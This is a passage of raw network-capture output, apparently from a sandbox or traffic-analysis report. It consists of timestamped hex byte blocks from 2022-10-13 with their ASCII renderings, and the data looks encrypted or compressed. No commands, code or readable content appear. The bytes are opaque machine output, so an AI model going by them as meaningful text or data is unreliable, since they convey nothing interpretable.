                                                                                                                2022-10-13 11:07:30 UTC384INData Raw: 8d ea 66 ed 60 31 9c 4a 08 8e 45 59 47 72 1d 8e 17 cf d0 96 28 fe 43 6d 1d ef 77 81 97 4c fc dd b4 e1 46 e4 dd 07 f0 dc bf 07 0c c0 21 20 f9 ba c8 af 73 94 28 c6 82 1a d6 cf cd ae 9d 02 68 c9 8f 6e f0 8b 9a 98 85 60 de 82 7d d7 bd c6 0f 36 58 82 da 69 cb 60 79 6a 9a 93 8b 16 a5 fb 38 b8 ee c8 ec fa 96 67 b7 58 3e e4 4c ec 09 fe 1e 27 d0 fc 14 f8 09 32 a0 70 58 cb 96 77 3a 75 50 02 44 ad dd 66 1d 3b 5d c9 cf 7e a5 ab 20 89 f8 a5 db 3b 64 ae f5 31 1b 8e d8 c7 0b 11 4e ef 27 06 d5 36 c7 47 58 9f 1e 03 c0 01 1a 58 e1 a7 eb 12 57 a1 2b 07 61 01 ce 29 07 1a 70 dc 37 cf 10 52 4a fa 60 f0 6c d6 6f ef a8 ae a2 03 5f 0e 1d e8 fa 49 d5 37 6b e0 17 00 d2 b1 a3 21 b6 8b 0d b7 b9 61 73 33 9a a0 6e c8 6b fc e9 58 40 d5 54 b7 88 7d c9 b2 9a cb fe db 71 ae c5 84 ee 65 7f
                                                                                                                Data Ascii: f`1JEYGr(CmwLF! s(hn`}6Xi`yj8gX>L'2pXw:uPDf;]~ ;d1N'6GXXW+a)p7RJ`lo_I7k!as3nkX@T}qe
                                                                                                                2022-10-13 11:07:30 UTC400INData Raw: e2 c0 7e 22 11 bb 3e 48 3f cc f8 2c f0 ee dc fc ff ee ea f4 3d 72 fe 3f f9 f4 a9 5e c6 80 e9 ca e0 46 12 c0 63 68 b5 3b 4e 2f cc 3c b4 f0 d9 de c4 09 04 e7 09 f4 bf 25 78 6e e9 26 d8 a9 fc 95 34 e6 db a1 78 f1 18 c0 3d 38 4b 1d d9 d6 bc 2b bc 95 b2 3f d9 16 4b 55 95 56 d4 dd 81 1a 17 92 59 5f 43 97 9b 18 1e 39 c6 5b 72 3e 64 c6 6c c5 52 81 37 06 76 17 42 19 0e b0 1d a4 a8 00 59 86 9c 65 6e 86 11 f3 80 fb 68 6c 2e ad 8f ab 9c 0c 83 a0 36 95 5e 8e 24 b1 92 26 f3 6c 7e a6 19 a8 87 c4 df 7d 48 bd f2 8a 0d fb b7 a7 32 04 60 1f 78 78 25 68 cb 84 34 6b f3 90 1b a5 fe f8 08 9b 69 74 ea ab 16 99 f5 c0 fe 90 60 0c 01 b2 b8 f5 a0 6d e1 ee 98 e8 22 b5 6c ab 88 de f3 8a e2 4b ad b0 f2 a3 0a 3c be e5 be 05 67 84 2d 2a 2b 6e 70 a6 ae 02 d9 66 c1 93 6c f2 ba 03 67 74 f4
                                                                                                                Data Ascii: ~">H?,=r?^Fch;N/<%xn&4x=8K+?KUVY_C9[r>dlR7vBYenhl.6^$&l~}H2`xx%h4kit`m"lK<g-*+npflgt
                                                                                                                2022-10-13 11:07:30 UTC416INData Raw: 39 a9 1e 51 e2 86 24 40 a0 c9 1a 7b 27 7a af c7 21 cd c8 fa 31 6a f1 a9 7e c8 56 85 35 c4 51 c5 9a 09 b6 cb 81 2c eb 40 66 d5 68 7a ba bb fb f4 06 69 db 52 fc eb 6b 1e 02 bd 7e 44 66 c0 ca da 5b 24 b1 1b b3 13 31 cc 2e 33 62 ba 97 f6 c9 6c e1 1c 88 82 54 6a 2a 02 c9 ea d4 fa b1 15 4d 40 84 a2 e7 b9 6a e1 ec 15 c4 01 e7 1e 80 3c c4 06 f2 ad e9 74 b0 a3 dd ad 00 e8 67 da 39 59 f3 3c 85 e8 98 ef 05 59 01 d6 52 51 35 19 15 e3 28 b9 39 ba d1 1f f1 e0 df d7 3b b5 b7 60 c5 3a 1a 55 c6 8f f1 6a 2f b6 78 72 68 85 44 e0 23 4e b0 45 15 ed 25 2c 3d 4c c9 21 37 6a ae 65 32 a5 45 a3 86 06 7c fd d2 5b bf 46 23 eb 5f f8 d2 7b 19 b4 10 b0 81 2d 9a 9c b3 29 a0 6c af 7c 4a 9c dc cd e9 09 04 10 c3 38 9c fa 47 63 ea eb 75 9a 94 bb da 17 81 d3 d6 bf f3 64 bb ef ef 83 d0 07 b6
                                                                                                                Data Ascii: 9Q$@{'z!1j~V5Q,@fhziRk~Df[$1.3blTj*M@j<tg9Y<YRQ5(9;`:Uj/xrhD#NE%,=L!7je2E|[F#_{-)l|J8Gcud
                                                                                                                2022-10-13 11:07:30 UTC432INData Raw: 02 12 3b bb 95 ec 07 64 a9 db 11 60 39 01 dd ef 09 df f0 3a 1e d0 09 ac 90 10 7e 87 eb d4 74 4c 70 43 37 d5 e5 6b a7 46 ea 3b 8d 1e 98 95 e0 22 f6 a1 f6 a2 ff 7d a5 90 43 f9 a8 58 cc 58 0c 47 79 28 7b eb 06 fc f9 4e 34 4e 98 7e b6 f2 ae b6 7f ac 6c 97 03 31 40 12 42 4a ef 5c cf 4c ec 32 3d 91 36 e1 25 06 aa 93 0b 72 f7 46 42 46 d6 20 2a e8 af 4c 74 8a fc bd 81 8f 2f dc d2 91 ee 70 03 7b 8d 41 78 93 40 22 2c 5d 39 17 d7 40 5a 89 d2 f6 58 8f 74 df b1 f5 fe 6d f8 7b 5b b4 6b d1 45 9d 51 f0 82 48 c4 fd d3 c7 b4 f4 5d 28 6a 3b 95 e3 a7 9d 12 07 10 35 8e 7a 91 26 7d 0c 0e 63 ed e4 8c 54 79 40 7a 92 07 b8 07 b8 c6 09 9e 33 12 d7 54 bc ed 6f 81 ac 39 1e 89 aa da 9e c2 cb 4c 9b 3e ef 46 e2 dc a2 be 31 7e 85 0a a0 44 cc a9 2b 0b 8f cd 83 dd 20 8a 33 5a ea 6a 6e 4c
                                                                                                                Data Ascii: ;d`9:~tLpC7kF;"}CXXGy({N4N~l1@BJ\L2=6%rFBF *Lt/p{Ax@",]9@ZXtm{[kEQH](j;5z&}cTy@z3To9L>F1~D+ 3ZjnL
                                                                                                                2022-10-13 11:07:30 UTC447INData Raw: b7 ac b9 9c d8 a9 0f 5c ea 72 33 00 12 bb 17 ce 94 d0 51 09 d5 bb 52 08 5c 0f e3 e6 b9 0a d4 fc c1 06 bd 89 14 39 4e 80 7b 11 69 5f 14 a3 d3 79 3a e3 ba 44 60 ab ae 0d 4a 5c 12 1e b0 09 31 1d e2 2f 0f 67 36 8f 09 0a db d0 30 9d df 52 46 24 bf 20 4a 54 53 6a 5b a6 e1 29 9b 3c f2 c1 84 c5 dd f5 26 74 75 78 43 cb 6d f5 cd fd 5f 45 dd 04 f6 c7 1d f4 89 ed f0 93 67 7e 99 a9 49 a3 01 f1 68 58 69 87 f6 56 c1 e8 be 0b 29 93 64 1d bf 45 dd b9 3b d6 66 39 3e 2d 4d 1b 88 32 0e 2b 92 06 dc 98 3e c4 7e dd 3a f9 9d 52 4b 43 42 c1 d2 2e 9c 17 a0 95 e0 8f 38 ca 50 0a 5b f6 80 54 2f fb 4c bf 28 6c 0e ea 1c c3 3d 58 a4 da e1 1f 3c 8d 3a 26 dd 24 90 38 ff 8a bd 88 03 65 a6 99 ed e3 d3 a0 02 a9 1f 7d 51 fb 96 bb cc 0a 89 06 4a 8a a2 fe b5 f6 11 49 2a 85 53 b0 c6 c9 98 53 f4
                                                                                                                Data Ascii: \r3QR\9N{i_y:D`J\1/g60RF$ JTSj[)<&tuxCm_Eg~IhXiV)dE;f9>-M2+>~:RKCB.8P[T/L(l=X<:&$8e}QJI*SS
                                                                                                                2022-10-13 11:07:30 UTC463INData Raw: e2 ff fa 97 b1 6d 0c 65 d2 c2 3b a9 60 6a 5f df f5 2c 3c 8b a2 2b 46 37 d5 cb ba 7c 5b 13 80 65 4d b6 4a ea ce 19 77 3b 2a 46 37 e8 80 a1 1c 31 65 aa 35 b7 6a c3 8e f7 b7 99 e5 dc 32 17 30 50 d1 a1 0c 85 82 d5 08 47 5f 38 5b 4b 9e 2d 5c 9b f8 c2 08 5d a5 31 88 48 63 78 a9 08 f4 e5 b2 b9 a5 fb d9 da 3b 1d e8 23 63 ea 67 cd 60 ac 76 e5 66 a0 04 c5 e4 82 01 be ec 70 4a 61 67 be 1b 9c e5 ec 92 fc 31 cd dd f4 b0 dd 5d e1 a3 c6 b7 1e 14 52 8d e4 ef 8d a3 84 91 cf 0d 32 48 76 7c af c4 47 f4 95 8f 69 4f 40 49 f9 3b e1 db 91 f0 9c 9f 44 0a 00 cc 14 4e 43 bc 3d ce fd dd 76 14 98 2f 49 12 bd e8 70 cb dd ce 55 be 2c 27 2d 72 62 51 cc 55 32 25 39 5b 15 cd e4 dc 82 66 ec 3d f3 5b 6d ee a4 1e 82 38 2b ff 45 4e a0 7c f4 17 c4 68 39 14 d0 88 df b7 b1 86 06 e9 a1 9c bf 97
                                                                                                                Data Ascii: me;`j_,<+F7|[eMJw;*F71e5j20PG_8[K-\]1Hcx;#cg`vfpJag1]R2Hv|GiO@I;DNC=v/IpU,'-rbQU2%9[f=[m8+EN|h9
                                                                                                                2022-10-13 11:07:30 UTC479INData Raw: 04 93 a5 68 03 0e a8 f9 0d e2 b0 5c c2 fb 3d ee f8 38 85 52 25 6e be c8 51 c0 30 d9 1a e8 63 d3 32 21 d5 80 6a dd 60 a2 ad e1 2c 12 3a 90 95 60 79 78 91 6e 62 d2 99 48 bf f0 43 ed 1d 00 ab 74 43 95 02 45 d0 a6 94 28 dd 50 3e 26 4b 59 5b 8e 8b fe 22 92 17 d9 c4 03 ef 5d 8c 57 bc 14 d1 f8 78 83 ad 1c 0d 9c d2 20 6e 4a f1 fb 70 90 92 81 c0 8f be 59 78 a0 b7 57 be f5 ca 87 1c a4 85 f1 3a 6a 84 8f ad bc ff df 10 bd a7 53 7b 02 31 92 4d ba 84 4c 1b ef 55 1b ae 48 9b 5e ba ac 62 03 c5 24 72 f3 7b 68 94 50 80 05 1b 94 51 d4 70 5e 7e 35 48 32 9f 42 dc b1 46 a8 9c 06 35 ca 61 a2 ca 3f a7 8e 2f bb 4e 0c 02 e4 10 e0 a7 bc 9d 9f 18 7c 97 cc d2 e3 d8 56 08 5f 3f d4 cd 01 d1 a6 0b 7d 22 75 f0 ae e7 b3 b7 41 0c 61 4e c2 c1 49 79 a2 c0 99 f5 8c 81 a0 8f 04 3d fb 26 53 0c
                                                                                                                Data Ascii: h\=8R%nQ0c2!j`,:`yxnbHCtCE(P>&KY["]Wx nJpYxW:jS{1MLUH^b$r{hPQp^~5H2BF5a?/N|V_?}"uAaNIy=&S
                                                                                                                2022-10-13 11:07:30 UTC495INData Raw: d7 0a 19 6c a7 3b e6 49 94 33 b1 90 8b 66 b5 4f 67 9b 96 75 6d 4e 45 6b f1 b4 36 af 11 cf df ad cd 82 9e d2 c5 99 a2 51 1c 8e 87 a8 ff 73 aa b9 78 10 37 b3 d8 25 ac 21 db e1 62 08 99 2f 28 7f 9b cd 19 00 f3 d9 23 37 7d 99 82 62 d8 2d 2c 26 ce 76 97 d5 91 47 0e 84 fd c2 16 2d cf 37 0c fd 00 22 90 d9 e2 95 26 1a 18 cc 15 42 a2 43 13 65 58 b4 f5 5b 78 20 bf ba 93 8c e5 b8 39 3b 2f ff 02 9c 31 95 8d 47 a2 a1 23 8b 66 19 68 6f db 62 fd f7 29 9b 9d 24 6f ef e8 4b 0f ec bc b5 b3 73 30 bb e0 1c 02 b5 dc 3b b6 f0 82 53 e6 26 8b 26 7b 0e e8 46 8c f5 c7 07 27 59 ff 80 4d f2 56 8f de 16 f8 f1 f1 c1 13 ef a4 1a 98 8d 95 be ce 7f 56 60 11 27 14 ce 01 01 d9 78 29 46 bf 95 b8 73 6d 68 48 1d 28 59 58 7a 60 d4 12 e4 0b 88 b8 c9 14 d4 1a dc 09 67 82 77 01 10 83 e0 c6 26 9c
                                                                                                                Data Ascii: l;I3fOgumNEk6Qsx7%!b/(#7}b-,&vG-7"&BCeX[x 9;/1G#fhob)$oKs0;S&&{F'YMVV`'x)FsmhH(YXz`gw&
                                                                                                                2022-10-13 11:07:30 UTC511INData Raw: 46 eb 7f bb 1f 55 05 4e 1f 30 47 59 88 d3 98 ef 22 9e c4 4b 86 4e 19 4a 63 db d1 3e 75 2a ad ae b9 7e 6a c5 11 34 c3 4d 65 82 30 b7 1f 0c 29 fc c5 18 34 07 8b 04 7d 63 d3 90 76 7a 2f 96 29 a0 02 18 fd 4b 00 ff 3a 5e aa 35 64 55 a2 6f 2b d9 02 f7 8a 3a fc 1c 4c 8f 1d 7e 57 6b 81 6a b2 ff ce b8 57 62 98 c5 ff cb c3 85 66 c9 8d 3c d1 ef 0c c5 4d 10 e7 d1 1e ff 07 5b 9d dc 2b b6 fe f3 b4 d0 12 e8 cc 12 47 6c 50 d9 e0 1a 40 95 ca 6b fc 8a e0 63 2e e2 32 cf ad 43 2e 2c 3b 33 38 62 e5 bc 80 1f a8 ad b9 18 7e ac 13 e5 6c 8c 45 59 85 f5 d2 0f d5 12 d6 d3 48 93 b1 00 d3 dc 2f ad 80 55 d2 6c 7f 99 79 e3 b6 d1 8f 07 f6 15 fc 97 46 b5 65 6b a5 e5 57 08 9e fc 84 8f 5e 5b 34 c5 fc 20 60 fc 67 82 36 8d 3d a3 dc c8 3c ab e4 b4 a7 06 20 55 a9 cf 42 ce 1f 6c 71 26 11 39 ff
                                                                                                                Data Ascii: FUN0GY"KNJc>u*~j4Me0)4}cvz/)K:^5dUo+:L~WkjWbf<M[+GlP@kc.2C.,;38b~lEYH/UlyFekW^[4 `g6=< UBlq&9
                                                                                                                2022-10-13 11:07:30 UTC527INData Raw: 41 ce 25 a4 30 97 53 c3 11 03 29 ca b1 5d 0a 60 ce cc 47 5e f1 00 f0 75 44 8c 06 5c cc 1a 43 ae 41 a3 76 46 b8 40 0c 78 9f 8e ae e5 d4 b9 26 9f 27 48 3e e6 ce 15 1d af 4b 5b 3f 0e 2b 3b 08 29 6c 5c 98 0a b7 d2 b3 c6 21 0b a5 d5 56 20 6c c4 a9 c5 74 c9 4b 80 5a 2c 88 3c 66 d0 a2 ad 00 1f c4 15 39 32 56 c0 dd 68 ea 3d 31 26 05 c8 e8 1f 15 74 ff 0e 15 f9 e8 07 a1 40 a2 15 90 cc fc 3d 89 0d bd 38 a4 5c dd 48 17 e0 72 2f cb 00 17 06 19 06 a0 23 fb 32 be f4 8a 05 c3 59 3a 1a 47 bf 87 5f ce 8c fd 60 09 87 cd 57 22 c6 1e c3 87 fc 80 f0 fc 9d 53 b7 74 4f b0 15 ea ed b5 bb 15 ac bb ba 1e 89 a6 1b d8 7d 0b 4a f2 d2 0e f8 16 f6 a7 0c dc 38 93 a2 3f ac 6d 1c 4c 75 95 1d 41 a7 ee 18 a2 c9 f5 75 34 57 c4 e9 a0 ed e3 d8 fb 43 60 d6 de 5c 4d 6d 9c 8e f6 0f 02 fc 28 6b 27
                                                                                                                Data Ascii: A%0S)]`G^uD\CAvF@x&'H>K[?+;)l\!V ltKZ,<f92Vh=1&t@=8\Hr/#2Y:G_`W"StO}J8?mLuAu4WC`\Mm(k'
                                                                                                                2022-10-13 11:07:30 UTC543INData Raw: cb e2 91 17 1e 14 8a a4 dd 82 3f e6 14 8d ce 31 62 7c 09 f8 a8 4c d1 70 24 36 f6 31 1a ff 20 4d a8 95 a7 01 4b 68 fb 07 83 8f 25 6a c2 e2 11 8b a5 60 80 8b 93 de 34 e4 0d 4e 08 a1 59 8a ac 59 6f 60 28 c1 db b1 ce 33 4b b5 bc fd 12 0e 14 91 80 05 10 6b 46 03 6a b6 b9 e0 3d 1f 1b 88 09 bf 86 15 34 d4 65 d1 a1 c8 5d 6f b7 85 d8 9c 1b 44 24 92 0c 42 69 82 62 1f 41 c9 0d 85 13 7a 40 9f 44 1d 47 54 d3 8d 46 a2 e0 9d cd 50 63 6d 98 0e 0d 90 67 3c 9e a1 4f 36 93 e9 4a b1 eb 0f db dc 66 43 89 cb c1 da e3 81 1c 8b fa e4 59 d2 97 cc f0 cb 41 88 15 74 86 85 aa 0a 32 04 81 ab 3a de 90 1e 85 5a 4f dd 33 03 58 46 21 aa 4c 1e bb 94 5b 1d c4 c4 80 8c 24 5f 6e 16 aa f2 9e a8 41 63 f5 74 bf ec b6 89 7b 45 d8 28 e6 26 d2 fe 78 d8 64 e8 a0 53 69 64 0f 26 f8 72 63 ec 32 76 1a
                                                                                                                Data Ascii: ?1b|Lp$61 MKh%j`4NYYo`(3KkFj=4e]oD$BibAz@DGTFPcmg<O6JfCYAt2:ZO3XF!L[$_nAct{E(&xdSid&rc2v
                                                                                                                2022-10-13 11:07:30 UTC559INData Raw: 65 46 86 d1 02 80 06 7a 91 b9 ee a5 46 0a 39 04 bb 85 12 7e f7 55 fa 3b df b2 c1 2c 09 31 34 a2 07 3a 4d 60 71 31 d2 27 28 70 10 1a 63 ce 35 87 91 82 64 32 44 9b 28 ff 54 d3 49 8c 23 2e 19 59 f4 e1 16 f2 5a ae 67 6c 89 34 46 03 1a 58 d1 bf a4 f0 7b 0b 51 e4 f6 8b ee a4 8b 6c 82 d0 07 9b 56 06 8d 7a 99 5e 48 9e 2a 48 a4 9d ce b8 1e 59 2c 33 d0 c8 21 e7 d5 e1 d4 60 1e 50 7d 3e ca cb 6f 8c d0 18 10 6f 26 aa 30 ef 5e ee 92 75 c4 ef 3d 5a 1d d7 29 14 be 37 52 81 27 53 04 c6 4f f6 ee 67 c4 f9 1c ce e5 5e d9 62 e0 0b e7 e8 d7 29 66 d3 dc a8 6d 43 27 07 56 38 45 35 1d f1 32 a7 24 b5 d2 cf 46 61 79 11 06 04 5a b0 eb 79 2e 56 fd 6f 36 bb 2a e7 6f 3a 9a bc 13 41 b4 69 11 ba 18 35 a8 46 35 02 33 02 ef 5e e6 e8 a9 b9 27 b4 6f c0 7d 0f be 82 1a 5d df 05 96 dd 0f 09 6d
                                                                                                                Data Ascii: eFzF9~U;,14:M`q1'(pc5d2D(TI#.YZgl4FX{QlVz^H*HY,3!`P}>oo&0^u=Z)7R'SOg^b)fmC'V8E52$FayZy.Vo6*o:Ai5F53^'o}]m
                                                                                                                2022-10-13 11:07:30 UTC575INData Raw: d0 25 d8 68 d3 2c da 67 50 89 13 00 08 4a 26 2f d0 48 fd 8e 86 3b 0f 4b 9d eb b6 32 38 27 76 e5 4f 4a b5 77 e2 bb 94 33 cd d3 f0 59 3d bd 51 2a df ba 84 76 8c f5 7e a7 1f a0 cc 2d 4f 16 e0 52 eb 22 04 3b 6c d5 73 5d 2c 12 8f 8e ab 5c b2 8a fa c4 0c 36 ef 99 56 90 99 9b 4b 2d 7b 41 57 98 2c 29 b8 8c 9c d6 92 44 9a 35 2f fa 81 e5 af 51 2a 65 09 d6 13 67 9e 5c 1f 09 b8 c2 8c 12 6f 2c 99 08 9b bd d6 02 de 47 50 c2 47 b1 1f c6 ec 8a 74 9d 2c 8e d0 72 9a 9a 15 32 71 18 14 38 d7 86 e1 08 ae 5c 26 62 a8 47 b3 02 de ff a5 94 2c 15 3a fe 01 f8 b9 ca b0 14 ec a9 c1 7f ba a7 2c 54 b3 e1 fb 45 b9 af 3b e7 ab 17 32 ea 58 0f e1 7d 5c 96 7a 98 e0 a5 78 8c ca 14 bb 5a c7 7a b4 7e 0d 7b bd fa 72 e5 80 9a b6 fa 16 b6 4d 97 ec 85 56 82 1d f5 4a 41 d1 9c bf 2d 62 a5 8e ff 92
                                                                                                                Data Ascii: %h,gPJ&/H;K28'vOJw3Y=Q*v~-OR";ls],\6VK-{AW,)D5/Q*eg\o,GPGt,r2q8\&bG,:,TE;2X}\zxZz~{rMVJA-b
                                                                                                                2022-10-13 11:07:30 UTC591INData Raw: f6 56 d1 ff 35 2b 78 92 de 2e 35 80 ef 5a ed e7 ab b5 68 47 f0 4e 02 92 5d 4c 1b fc fc 2f 65 1b 85 19 f2 04 37 ce d1 9b 07 e6 2f 83 16 1d 55 a7 76 7a 5d ab d6 87 fd 8c ec 2b 7e 9f 4d bb b4 c2 14 d1 2b 91 f2 be b9 d4 c1 71 8c d7 b8 37 45 49 cf 69 49 27 68 7e 4f af db bb 75 ff 01 03 28 a6 3e 6a b2 1b 6d 3d 14 c7 8f 4a e5 9d a2 98 f0 c2 23 42 1d a7 0b c8 f3 50 b1 47 99 f3 65 62 8c 09 89 80 de 01 e7 8e c0 5c 07 bc 1c 3c 12 69 b8 59 b8 8a 75 6c 98 f8 84 84 12 22 27 84 94 f8 96 94 8c 95 37 17 35 09 39 67 f0 4d 1f ab 7f 30 ea 7d f0 aa d3 47 ae a8 c3 42 e2 7c 95 6f e0 04 04 d8 06 f2 d9 ec c0 d6 1a ef 79 3e 44 32 ba f9 54 f7 4e 80 f0 03 3d 33 79 be 08 56 1f 39 4d 05 df ae af 53 f0 f1 e6 80 49 4a 03 68 a4 3e 4b 32 b5 6b 1b ce 8e 75 0f fe bb e0 d0 cd 77 66 0a 5a 62
                                                                                                                Data Ascii: V5+x.5ZhGN]L/e7/Uvz]+~M+q7EIiI'h~Ou(>jm=J#BPGeb\<iYul"'759gM0}GB|oy>D2TN=3yV9MSIJh>K2kuwfZb
                                                                                                                2022-10-13 11:07:30 UTC607INData Raw: 56 bc cf b3 e8 99 a5 14 82 3f 4b 68 b1 b9 73 0e ca 88 3b ec 27 8f 52 82 75 ce d8 a0 a2 09 ad 66 9b 1b f2 fe 87 2b 9f 99 59 d8 24 3c b2 8d 1d 18 59 3f c8 07 70 23 96 a7 24 48 ba e0 e5 67 ab cd 44 89 1c e8 99 bf 73 61 5f de 96 6e 8f 78 0a 43 ac f8 4c bd c5 ab ed 29 b2 76 56 d3 1e ef d6 6b fd f1 c8 53 10 18 18 76 b6 9d 66 c2 9f 14 cc d3 41 f7 18 d2 65 03 f6 c7 21 17 61 c0 d5 e4 2e 42 44 fd c7 fb 4f 8c cd 80 d4 98 7e aa 18 80 76 5c 7c 9c eb a4 0c 7d 85 8d 91 45 9f d3 4e 5f 34 d0 c1 59 1c 44 c6 b0 29 6d 80 cc 5f 47 c1 40 b7 d9 c8 c5 50 9e 21 55 db 3c 0a 9d 7a 55 86 19 38 c3 fb 71 44 a7 29 da 6d 2a 80 3e bf 5f 16 17 1e d5 28 bf c9 11 00 e2 cb 9c 4e b7 e2 0f ed bd 60 98 13 ff 8a 89 b9 99 32 50 b8 67 5f b5 c2 68 fe d5 13 86 d4 b2 75 fa 85 f6 66 b8 7a fc e0 ac f6
                                                                                                                Data Ascii: V?Khs;'Ruf+Y$<Y?p#$HgDsa_nxCL)vVkSvfAe!a.BDO~v\|}EN_4YD)m_G@P!U<zU8qD)m*>_(N`2Pg_hufz
                                                                                                                2022-10-13 11:07:30 UTC623INData Raw: f8 db 87 d9 f7 5f 0d 96 3e e0 d1 6b 47 c7 70 54 f7 14 1c 10 26 aa d7 f0 a4 df cb 3c 2b a4 a8 e4 89 38 65 a5 2b 53 a4 9a 0d 84 16 21 62 86 2d 94 99 0b 6d 4d 26 e7 fe b7 20 55 91 65 16 61 1b 60 b4 34 a7 ac 27 0a 9b 9e 62 29 20 a1 92 a3 bb 61 34 7f ef bd 90 a5 14 6d a2 95 36 a4 17 d8 04 cd c3 d6 05 58 3e a3 26 59 5e e2 af e7 15 63 fc b5 19 64 9b 63 e7 21 bc ef 2d 8b 22 90 60 0e a6 d1 4a d5 31 84 db f0 c7 71 52 c6 77 e8 e9 a3 6f fb b2 a9 79 50 eb 73 fa 04 28 e5 35 7d 48 b0 68 5c 85 4a 89 aa eb 24 d5 40 4f da 4c d4 f6 20 09 83 c6 26 ee 5f 3f 8a 95 94 be 55 3f 81 6c ac a2 fb 93 18 b9 92 ac fb e6 4d ec 2a ce 03 c4 ef 8e 54 40 d3 8a 1f e7 6f 1a 9d 8a c5 38 f9 df 56 a7 7a e7 0d 6d bd 30 22 4d d4 4e 96 26 7e 64 a3 78 a7 ca bf 5c f5 04 62 9b f1 ea 4e 12 27 f1 03 01
                                                                                                                Data Ascii: _>kGpT&<+8e+S!b-mM& Uea`4'b) a4m6X>&Y^cdc!-"`J1qRwoyPs(5}Hh\J$@OL &_?U?lM*T@o8Vzm0"MN&~dx\bN'
                                                                                                                2022-10-13 11:07:30 UTC639INData Raw: 30 52 8e e3 40 14 22 8c cb 0c 82 15 02 cb 53 77 e9 6b 32 17 b5 cd 86 d1 98 8d 3e 4b 74 48 73 bd b7 35 09 ed 71 4a c5 36 bc f8 e5 63 dd d2 ab 58 4a f5 0e 4b 60 b4 4a 61 dd d9 58 64 70 bb e2 7a ba 26 bb 63 03 7c 46 03 65 19 10 d1 83 a5 64 37 62 88 0c 73 57 2b 93 35 f4 cf c7 80 8d 60 31 6d 0c c6 49 84 5b b2 23 1b 49 9c 19 9c 83 64 18 a0 c6 08 63 12 f3 1c 2f fc bc 2c 2e df ac 51 17 28 c3 eb 9c 69 3f a5 e1 2f f7 82 dc 59 d5 0a 97 f9 6a 75 a5 c5 e0 5a 90 67 6e f1 79 1a 13 80 86 aa b0 93 59 31 44 5c c1 c1 d0 69 56 53 2f 30 b9 52 a8 cf 11 55 44 17 25 32 eb 48 65 58 83 e9 ec f7 a2 42 d0 bb 5e 66 fb fa 94 c9 17 d1 bb 84 f0 ae 3c fa f8 1b b5 d9 54 1c da ed 81 7a 10 31 23 09 a9 5b a8 94 ba 83 fe 5e 1e e0 1a c1 67 7d 98 39 58 b6 dc b3 1c d4 a7 4b b8 93 5e 4a 33 22 dc
                                                                                                                Data Ascii: 0R@"Swk2>KtHs5qJ6cXJK`JaXdpz&c|Fed7bsW+5`1mI[#Idc/,.Q(i?/YjuZgnyY1D\iVS/0RUD%2HeXB^f<Tz1#[^g}9XK^J3"
                                                                                                                2022-10-13 11:07:30 UTC655INData Raw: bb a7 bb 47 3f 66 e4 d3 88 b6 b2 52 fc 08 46 6b 52 0c 64 cc d5 ea 12 85 41 f3 66 79 92 12 60 c1 9e 92 9c 6e 8d 71 e4 a7 2c 36 50 c2 d5 f0 ef 3f 12 ea 3a 0a eb 59 88 cc fc 52 17 27 fa 87 12 5a fa 61 d4 f6 75 29 1c 2b d1 ea 3b 5a db ca de 56 cc d2 9b 77 2b 2d 28 ea bf 7e 8a 6c f8 da 06 46 be ff 3a 6d 45 f4 05 db 71 c1 8b ed 00 a4 89 3f 5f 96 db bf 8d 40 b7 34 47 25 0d 6c 08 43 07 7a 25 63 aa f3 fa 1d d4 c1 9b b8 a5 9d 3e 6c b0 ef 24 00 0a ee ee 72 1e 81 f7 b0 80 fe be 78 e4 b4 7b 43 e2 e5 47 1d 19 9e 47 24 31 07 ed dc 29 7b 1a e0 69 08 1c 5e 34 09 3b 23 fa 2e ad 98 e7 c1 fd ca 6e 16 0a b9 80 ef ad 27 51 b4 fa b8 97 5d 40 bf 7c 3f 3c 16 b0 cf ac 80 a3 c9 8c d7 3a a3 aa 87 00 36 4f 8c f7 fa 8e 1c b2 d3 cf 74 aa 04 d2 4d c1 f7 2d 1b 56 54 b3 97 2d c7 4a e5 1b
                                                                                                                Data Ascii: G?fRFkRdAfy`nq,6P?:YR'Zau)+;ZVw+-(~lF:mEq?_@4G%lCz%c>l$rx{CGG$1){i^4;#.n'Q]@|?<:6OtM-VT-J
                                                                                                                2022-10-13 11:07:30 UTC671INData Raw: 17 09 a5 23 54 4f 67 5f c8 ea a9 d0 4e 3b d9 ad c9 a3 93 ef f0 4a 51 1b c5 7c 0f eb f5 5b 5a c2 cf 9b 38 64 d8 e8 ca ed 8c 4d cb e0 07 d3 1a df 23 f4 f8 7d ad a1 0f df ce b7 8e 24 8d c0 ef 17 03 2c 10 8a ba b7 cf 8d d1 64 cf ff 5c 8a b8 c7 e4 dd 06 d9 0e 1d d8 e9 33 a5 39 38 0e e4 e2 eb c8 af 25 1c e0 2e 0a c0 0d a0 ef bf e2 42 8c 8a 73 ed e6 34 a5 47 06 64 ff 38 70 de 85 b2 07 7a 3f c8 cd ec fa 26 2f c5 26 9d c9 e1 0c b0 f6 15 99 51 a9 8b cd 99 6c d6 4d eb a6 7e 8e 48 11 70 ae db 9b 4f 52 fa c0 31 96 2e 5d 03 67 a2 c9 63 c6 b3 d4 99 aa 42 49 a7 6c 31 75 de 14 8e 38 01 01 3a 52 d9 25 dd 7f 99 3d 98 3d 64 df 35 06 25 11 83 a0 29 7f c8 c1 25 44 34 4b a4 e1 8e a2 6c 86 08 e6 59 e8 83 17 67 cc bc 2b 14 f2 dd 33 7d e9 2f fc 41 d7 a1 96 d6 ec 66 b9 01 14 d0 5a
                                                                                                                Data Ascii: #TOg_N;JQ|[Z8dM#}$,d\398%.Bs4Gd8pz?&/&QlM~HpOR1.]gcBIl1u8:R%==d5%)%D4KlYg+3}/AfZ
                                                                                                                2022-10-13 11:07:30 UTC687INData Raw: e0 e8 80 96 f1 89 4a 21 10 57 19 ca d8 9e 0b 62 cd a3 ca e2 db 6e 49 58 e6 f3 c2 34 a7 8c af 31 42 b8 f4 bc 41 1a 49 c1 81 40 56 15 70 7b 9a 92 d2 f7 f4 24 80 36 fe 9b f6 ed 3f 64 15 90 98 36 19 53 f6 75 bd 1a ff 4f 5d 58 e5 19 31 94 b3 3c cf 05 75 24 1a ca 5a 77 ae a1 72 68 2b 67 75 8f 78 b8 c1 16 2b 04 8e 7e 01 01 41 19 02 b2 ac 39 3c d4 ea de 89 03 b6 44 ba 91 68 b3 b8 01 77 6a 23 8c ea e2 69 46 96 d1 e9 5b a3 b4 98 aa ee c3 c0 ec 27 b5 1a 21 69 ed 3c 10 5d f3 42 fb d3 8c 90 6d a3 bd 26 ac 74 c1 50 ee 88 af ad a9 e1 bd 85 ef 84 82 d0 12 12 2d f6 ab 32 c0 83 82 48 cf 0e 86 5a 58 56 53 26 0d 01 0a c0 54 d9 78 89 27 05 f0 5b 2a 28 19 